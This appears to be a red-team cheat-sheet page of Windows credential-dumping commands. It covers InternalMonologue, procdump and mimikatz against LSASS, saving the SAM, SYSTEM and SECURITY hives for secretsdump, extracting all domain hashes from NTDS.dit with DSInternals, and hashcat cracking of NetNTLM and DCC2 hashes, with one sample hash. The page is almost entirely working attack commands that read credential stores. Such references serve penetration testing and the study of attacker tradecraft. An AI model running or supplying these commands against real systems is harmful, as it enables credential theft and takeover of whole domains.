Alternate Cred Dumps
Internal monologue is a way of dumping creds without touching LSASS.
execute-assembly /root/ADShare/NET4.6.2/InternalMonologue.exe [help]
hashcat hashes.txt /usr/share/wordlists/rockyou.txt -m 5500 -force
# Dump with sysinternal windows signed binary
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
# Move lsass.dmp offline and use mimikatz to open and dump passwords
mimikatz # sekurlsa::minidump /root/lsass.dmp
mimikatz # sekurlsa::logonpasswords
# Viewing dump with invoke-mimikatz
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::minidump C:\lsass.dmp" "sekurlsa::logonpasswords"'
reg save hklm\system system
reg save hklm\security security
reg save hklm\sam sam
# Extract
python secretsdump.py -security security -system system -sam sam LOCAL
# Cracking MS-Cachev2 hashes recovered
Make the this format:
$DCC2$10240#username#hash
Crack:
hashcat -m2100 '$DCC2$10240#spot#3407de6ff2f044ab21711a394d85f3b8' /usr/share/wordlists/rockyou.txt --force --potfile-disable
# For this you need the NTDS.dit file and the SYSTEM registry hive
# You will also need DSInternals PowerShell module. This can be moved across machines.
# Import DSInternals
import-module C:\Users\Administrator\Documents\DS\DSInternals\4.3\DSInternals.psd1
# Grab the bootkey from SYSTEM hive. This can be one offline or in a mounted DC VM.
$key = Get-BootKey -SystemHivePath D:\Windows\System32\config\SYSTEM
# Extract user information from NTDS.dit
Get-ADDBAccount -All -DBPath 'D:\Windows\System32\ntds.dit' -BootKey $key
# Extract Hashes from NTDS.dit in a dcsync format
Get-ADDBAccount -All -DBPath 'D:\Windows\System32\ntds.dit' -BootKey $key | Format-Custom -View HashcatNT | Out-File vault-hashes.txt -Encoding ASCII
# File can then be cracked, used as normal DCSync would.
Last modified 3yr ago